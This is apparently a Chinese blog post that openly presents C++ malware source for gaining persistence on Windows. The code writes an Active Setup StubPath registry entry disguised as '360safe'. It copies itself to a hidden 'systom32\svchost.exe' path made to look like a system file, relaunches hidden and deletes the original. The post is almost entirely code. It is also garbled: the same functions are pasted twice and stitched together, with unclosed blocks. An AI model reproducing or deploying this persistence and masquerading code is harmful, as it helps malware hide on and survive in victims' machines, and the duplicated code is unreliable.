本文介绍了一种恶意软件实现自启动的技术手段,包括修改注册表、复制自身到系统目录并设置为隐藏等步骤,以此达到开机自动运行的目的。
void ActiveRun()//ActiveX自启动的函数
{
char WinPath[MAX_PATH];
GetWindowsDirectory(WinPath,sizeof(WinPath));
strcat(WinPath,"\\systom32\\svchost.exe");
HKEY hKey;
RegDeleteKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H8I12RB01-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"); //删除用户里的ACTIVE,免得不知执行
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H8I12RB01-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}",&hKey);
RegSetValue(hKey,NULL,REG_SZ,"360safe",strlen("360safe"));
RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE*)WinPath,lstrlen(WinPath));
RegCloseKey(hKey);
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
ActiveRun();
int nRetCode = 0;
//Begin=======首次运行,拷贝安装========
char DstFilePath[256];
char SrcFilePath[256];
memset(DstFilePath, 0, 256);
memset(SrcFilePath, 0, 256);
::GetWindowsDirectory(DstFilePath,sizeof(DstFilePath));
strcat(DstFilePath,"\\systom32\\");
CreateDirectory(DstFilePath, NULL);SetFileAttrib(DstFilePath);//隐藏路径
strcat(DstFilePath,"svchost.exe");
GetModuleFileName(NULL, SrcFilePath, sizeof(SrcFilePath));
if (_stricmp(SrcFilePath,DstFilePath) != 0)
{
DeleteFile(DstFilePath);
if(::CopyFile(SrcFilePath,DstFilePath,FALSE)==0)
return -1;
SetFileAttrib(DstFilePath);//隐藏文件
WinExec(DstFilePath,SW_HIDE);
uninstall();//自删除
ExitProcess(0);
}
{
char WinPath[MAX_PATH];
GetWindowsDirectory(WinPath,sizeof(WinPath));
strcat(WinPath,"\\systom32\\svchost.exe");
HKEY hKey;
RegDeleteKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H8I12RB01-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"); //删除用户里的ACTIVE,免得不知执行
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H8I12RB01-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}",&hKey);
RegSetValue(hKey,NULL,REG_SZ,"360safe",strlen("360safe"));
RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE*)WinPath,lstrlen(WinPath));
RegCloseKey(hKey);
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
ActiveRun();
int nRetCode = 0;
//Begin=======首次运行,拷贝安装========
char DstFilePath[256];
char SrcFilePath[256];
memset(DstFilePath, 0, 256);
memset(SrcFilePath, 0, 256);
::GetWindowsDirectory(DstFilePath,sizeof(DstFilePath));
strcat(DstFilePath,"\\systom32\\");
CreateDirectory(DstFilePath, NULL);SetFileAttrib(DstFilePath);//隐藏路径
strcat(DstFilePath,"svchost.exe");
GetModuleFileName(NULL, SrcFilePath, sizeof(SrcFilePath));
if (_stricmp(SrcFilePath,DstFilePath) != 0)
{
DeleteFile(DstFilePath);
if(::CopyFile(SrcFilePath,DstFilePath,FALSE)==0)
return -1;
SetFileAttrib(DstFilePath);//隐藏文件
WinExec(DstFilePath,SW_HIDE);
uninstall();//自删除
ExitProcess(0);
}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
